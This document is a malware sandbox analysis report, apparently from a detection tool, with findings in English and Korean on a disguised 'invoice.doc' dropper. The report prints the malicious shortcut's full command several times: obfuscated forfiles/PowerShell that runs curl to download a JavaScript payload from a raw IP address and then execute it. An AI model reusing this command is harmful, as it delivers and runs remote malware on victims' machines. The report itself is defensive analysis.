Malicious DOC/DropFileExec.FW.1010 profrog 1.5.0.305 10 invoice.doc DOC 2.817780 false false

invoice.doc_16880 d:\Sample\sample_for_QuadMiners\invoice.doc invoice.doc 16880 DOC 36B85687634E5B6E4E22CA582D0CC99D 1B51B1206F2C4B1030A7FCA525454FB4D5BC803E invoice D80336481A8DD017C0B966BC18E74609243A2F05 504B0304140006000800000021007C93BE7C8C010000B5050000130008025B436F6E74656E745F54797065735D2E786D6C20A2040228A000020000000000000000000000000000000000000000000000 skeml.lnk_258 invoice.doc_16880 D:/GIT/tripitaka/Build/x64Debug/tripitaka.exe.sandbox/C/Users/Public/skeml.lnk skeml.lnk 258 LNK 1205E837D76605911605E2FB589CD98D FF41313E2F2A860B0573F5EFA77B9962A88B3D82 A07F1A5D03FC4E065DA890134F5794457BDEBF86DF834B21CFFCE63E43491D9D 086F7D4F4022A035D30A5DAFB1422C0C178C76BE EFBBBF5B44454641554C545D0D0A57696E646F775374796C653D370D0A49636F6E4C6F636174696F6E3D0D0A546172676574506174683D664F7266694C65530D0A417267756D656E74733D2F7020633A profrog 1.5.0.305 invoice.doc_16880 FakeEXT-DOCX 3 DOCX file has faked as `DOC` format. DOCX 형식의 파일이 `DOC` 형식인 것처럼 위장했습니다. profrog 1.5.0.305 invoice.doc_16880 GetObject BC 1 GetObject("NeW:72C24DD5-D70A-438B-8A42-98424B88AFB8"), RET: WSCRIPT.SHELL GetObject("NeW:72C24DD5-D70A-438B-8A42-98424B88AFB8"), RET: WSCRIPT.SHELL profrog 1.5.0.305 invoice.doc_16880 CreateShortCut BC 2 ARF5XJ(WSCRIPT.SHELL).CreateShortCut("C:\Users\Public\skeml.lnk"), RET: SHORTCUT ARF5XJ(WSCRIPT.SHELL).CreateShortCut("C:\Users\Public\skeml.lnk"), RET: SHORTCUT profrog 1.5.0.305 invoice.doc_16880 Save BC 1 RECO(SHORTCUT).Save() RECO(SHORTCUT).Save() profrog 1.5.0.305 invoice.doc_16880 FileCreated FW 3 New file (C:\Users\Public\skeml.lnk) has been created. [DEFAULT] WindowStyle=7 IconLocation= TargetPath=fOrfiLeS Arguments=/p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js" WorkingDirectory= 새로운 파일 (C:\Users\Public\skeml.lnk)이 생성되었습니다. [DEFAULT] WindowStyle=7 IconLocation= TargetPath=fOrfiLeS Arguments=/p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js" WorkingDirectory= profrog 1.5.0.305 invoice.doc_16880 FileExtracted FW 3 C:\Users\Public\skeml.lnk profrog 1.5.0.305 invoice.doc_16880 Exec BC 3 ARF5XJ(WSCRIPT.SHELL).Exec("rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk") ARF5XJ(WSCRIPT.SHELL).Exec("rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk") profrog 1.5.0.305 invoice.doc_16880 DropFileExec FW 10 This is an attack that dropped an hidden file and executes. 감춰둔 파일을 생성해서 실행하는 공격입니다. profrog 1.5.0.305 invoice.doc_16880 RunDll32 FW 3 Attempts to execute a OpenURL() of url.dll. It is used when performing malicious actions with a DLL received from an external source. url.dll의 OpenURL()를 실행하려고 합니다. 외부에서 받은 DLL로 악성행위를 수행할 때 사용됩니다. profrog 1.5.0.305 skeml.lnk_258 ForFiles FW 3 Attempts to run with forfiles. /p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js" forfiles로 특정 명령을 실행하려고 합니다. /p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js" profrog 1.5.0.305 skeml.lnk_258 PowerShell FW 8 Attempts to perform malicious commands with PowerShell. command:PowerShell.exe /W 01 curl http: //209.127.20.13/woke.js -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js PowerShell로 악의적인 명령을 수행하려고 합니다. command:PowerShell.exe /W 01 curl http: //209.127.20.13/woke.js -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js